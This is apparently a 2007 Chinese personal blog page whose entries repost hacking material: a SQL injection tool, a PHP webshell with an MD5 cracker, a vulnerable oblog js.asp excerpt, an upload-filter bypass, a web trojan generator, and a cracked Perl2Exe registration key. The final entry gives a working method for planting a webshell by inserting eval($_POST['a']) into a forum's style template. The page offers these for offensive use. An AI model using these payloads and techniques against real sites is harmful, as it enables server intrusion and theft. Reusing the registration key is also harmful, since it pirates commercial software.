hehe9011
男, 19岁
江西 南昌
上次登录:
1天前
 加为好友
|
|
2007年04月26日 星期四 19:06
躲到一个阴暗的社会角落里去了...找得到就找...呵呵 |
2007年04月24日 星期二 19:30
来自:http://www.hackm.com/read.php?tid-2014.html
作者:28度的冰
写得相当的草率。
1,直接爆密码的只是考虑到了直接报错能爆出密码的情况。所以没有涉及到特征字符,也没有用二分法猜解密码。所以不太好用。
2,sql的如果遇到sa执行命令自然爽,可是我测试条件有限,没有能遇到sa的,所以没有完善代码,如果点了命令之后蹦出一个msgbox那说明命令执行成功...。对于DBO权限,列目录还是可以的,只不过有些不方便。。。
对了 好像还少一个log备份shell功能 |
2007年04月23日 星期一 19:09
又一个来自国外的phpshell,在milw0rm看到的。
关于为什么起这个名字,作者说:“Couldn't think of a name so it became "Shell I"...”
phpshell不稀奇了,介绍这个phpshell主要是他有一个比较有新意的功能:md5 cracker with custom options
可以直接在这个phpshell中利用当前网站服务器进行md5的暴力破解。
|
2007年04月22日 星期日 17:41
漏洞文件:js.asp
<%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request(”n”))
if n=0 then n=1
select case CInt(Request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8 |
2007年04月22日 星期日 17:39
2007年04月21日 星期六 19:29
注:方便编译perl写的EXP。就像以前发过的可以将php的exp转换成exe的 Bambalam PHP EXE Compiler/Embedder 。
来源:7jdg's Blog
很久没有用过这东西了,今天从机子上找出来一个是8.4版的,老的不能用了..来个新的,带注册机
引用
C:p2x-8.80-Win32>perl2exe -register
Perl2Exe V8.80 Copyright (c) 1997-2006 IndigoSTAR Software
Please enter your registration key, or press enter to cancel
1v1:name:20070320,54419
Registered
引用
C:p2x-8.80-Win32>perl2exe
Per |
2007年04月19日 星期四 18:58
作者:sk@scan-associates.net
来自: http://www.securiteam.com/
翻译:DemonAlex
更新:2006年11月11日
摘要:
下文是为了帮助那些希望能掌握这个漏洞的运用、并想得知如何保护自己免受这种漏洞攻击的人了解该漏 洞的本质而写的。
详细资料:
1.0绪论
当一台机器只开放了80端口(这里指的是提供HTTP服务)时,可能你的大多数漏洞扫描器都不能给到你很多 有价值的信息(漏洞信息),倘 |
2007年04月18日 星期三 18:29
作者: close999
来源:红狼安全小组( www.wolfexp.net, www.crst.com.cn)
原理 : Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa
突破的前提条件是 : 服务器是win2003 全功能的空间
**************************************************
'函数名:UserNamefilter(
'作 用:过滤用户名(增强过滤,用户名现 |
2007年04月18日 星期三 18:26
来自安全警戒线论坛~~
平凡多功能自升级网马生成器超酷版V1.0
|
2007年04月16日 星期一 19:33
来源:猪猪's blog
方式1 模板法
进入后台, 风格模版设置 ,在随便一行写代码
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
print <<
例如,我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST[’a’]);
print <<.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}
而后得到一个shell
|
|
|
|
送他礼物
发送消息
